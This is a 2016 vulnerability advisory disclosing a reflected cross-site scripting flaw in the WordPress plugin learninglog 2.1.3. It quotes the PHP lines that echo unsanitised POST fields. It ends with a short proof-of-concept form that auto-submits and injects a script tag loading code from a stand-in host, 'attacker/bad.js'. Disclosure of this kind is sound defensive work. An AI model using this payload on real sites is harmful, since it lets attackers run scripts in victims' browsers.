Advisory #: 1065
Title: Reflected XSS in wordpress plugin learninglog v2.1.3
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/learninglog
Downloads: 7510
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: learninglog
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php: 336: <td><input type="text" id="institution_teacher_name" name="institution_teacher_name" value="<?php echo $_POST["institution_teacher_name"]; ?>" /></td> 340: <td><input type="text" id="institution_name" name="institution_name" value="<?php echo $_POST["institution_name"]; ?>" /></td> 344: <td><input type="text" id="institution_adress_1" name="institution_adress_1" value="<?php echo $_POST["institution_adress_1"]; ?>" /></td> 348: <td><input type="text" id="institution_adress_2" name="institution_adress_2" value="<?php echo $_POST["institution_adress_2"]; ?>" /></td> 352: <td><input type="text" id="institution_role" name="institution_role" value="<?php echo $_POST["institution_role"]; ?>" /></td> 356: <td><textarea id="institution_bemerkungen" name="institution_bemerkungen"><?php echo $_POST["institution_bemerkungen"]; ?></textarea></td> 523: <td><input name="username" id="username" value="<?php echo $_POST["username"]; ?>" /></td> 527: <td><input name="name" id="name" value="<?php echo $_POST["name"]; ?>" /></td> 531: <td><input name="email" id="email" value="<?php echo $_POST["email"]; ?>" /></td> 840: <td colspan="2"><textarea name="textarea_data" cols="90" rows="12" style="width:100%"><?php echo $_POST["textarea_data"]; ?></textarea></td> The variable institution_teacher_name appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/learninglog/bp-bulk-import-blogs/bp-bulk-import-blogs.php method=post> <input type=hidden name=institution_teacher_name value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>